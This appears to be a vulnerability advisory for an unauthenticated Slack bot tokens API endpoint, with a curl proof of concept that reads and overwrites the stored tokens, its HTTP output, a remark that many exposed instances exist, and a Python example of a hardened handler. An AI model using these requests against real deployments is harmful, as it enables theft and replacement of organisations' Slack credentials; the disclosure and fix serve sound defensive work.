Summary
Unauthenticated GET/SET of Slack bot tokens: anyone with network access can steal the Slack bot tokens and set new ones. This implies full compromise of the customer's Slack bot, leading to scary internal Slack access... 😓
FYI, many instances (quick Shodan scan) are already vulnerable to this.
Details & PoC
```shell
alias crli='curl -sSkiL'
# 1. Read the stored tokens with no credentials at all (first run: nothing stored yet)
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# 2. Overwrite both tokens, still without any credentials
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens -X PUT -H 'Content-Type: application/json' --data-binary '{"app_token": "aaaa", "bot_token": "aaaa"}'
# 3. Read them back: the values written in step 2 come straight out
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
```

Output of step 1 (before the PUT) and step 3 (after the PUT):

```
# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 404
# date: Mon, 08 Apr 2024 10:34:16 GMT
# content-type: application/json
# content-length: 28
# server: istio-envoy
# x-envoy-upstream-service-time: 3
#
# {
# "detail": "No tokens found"
# }
# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 200
# date: Mon, 08 Apr 2024 10:34:18 GMT
# content-type: application/json
# content-length: 39
# server: istio-envoy
# x-envoy-upstream-service-time: 5
#
# {
# "bot_token": "aaaa",
# "app_token": "aaaa"
# }
```
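As an added example (not code from the project this advisory concerns), a hardened stand-in for the tokens endpoint in plain Python: it requires an admin session on every method (the check the PoC shows is missing), rejects tokens that do not look like Slack `xoxb-`/`xapp-` tokens, and never echoes stored secrets back unmasked. The session cookie name, the session store and the token store are assumptions.

```python
import json
import re
from dataclasses import dataclass, field
from http import HTTPStatus

# Constructed session store (session id -> role); stands in for the real backend.
SESSIONS = {"sess-admin-1": "admin", "sess-user-2": "basic"}

# Slack bot tokens start with "xoxb-", app-level tokens with "xapp-".
TOKEN_SHAPE = {
    "bot_token": re.compile(r"^xoxb-[A-Za-z0-9-]+$"),
    "app_token": re.compile(r"^xapp-[A-Za-z0-9-]+$"),
}


@dataclass
class TokenStore:
    tokens: dict = field(default_factory=dict)


def _role(headers):
    # Hypothetical cookie name; what matters is that every method goes through here.
    sid = headers.get("Cookie", "").removeprefix("session=")
    return SESSIONS.get(sid)


def _mask(token):
    # A short prefix lets an admin tell tokens apart without exposing the secret.
    return token[:8] + "..."


def handle_tokens(method, headers, body, store):
    """Handler for /api/manage/admin/slack-bot/tokens: returns (status, JSON body)."""
    if _role(headers) != "admin":  # the authorization check the advisory found missing
        return HTTPStatus.UNAUTHORIZED, {"detail": "Admin session required"}
    if method == "GET":
        if not store.tokens:
            return HTTPStatus.NOT_FOUND, {"detail": "No tokens found"}
        return HTTPStatus.OK, {k: _mask(v) for k, v in store.tokens.items()}
    if method == "PUT":
        try:
            data = json.loads(body or "")
        except json.JSONDecodeError:
            return HTTPStatus.BAD_REQUEST, {"detail": "Invalid JSON"}
        bad = [k for k, rx in TOKEN_SHAPE.items() if not rx.match(str(data.get(k, "")))]
        if bad:
            return HTTPStatus.UNPROCESSABLE_ENTITY, {"detail": f"Malformed: {bad}"}
        store.tokens = {k: data[k] for k in TOKEN_SHAPE}
        return HTTPStatus.OK, {k: _mask(v) for k, v in store.tokens.items()}
    return HTTPStatus.METHOD_NOT_ALLOWED, {"detail": "Method not allowed"}
```

Answering anonymous callers with 401 rather than 404 keeps unauthenticated probes of this path easy to spot in access logs.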
Impact
"Pretty big impact" aka "Slack access from WWW" aka "We're f*ed!"
Note
I checked and it seems that there's no path from ARBITRARY TOKENS SET to ADMIN XSS, which is nice, as there are way more critical issues on the admin side; more on this in the next issue!
Have a nice day! 🌹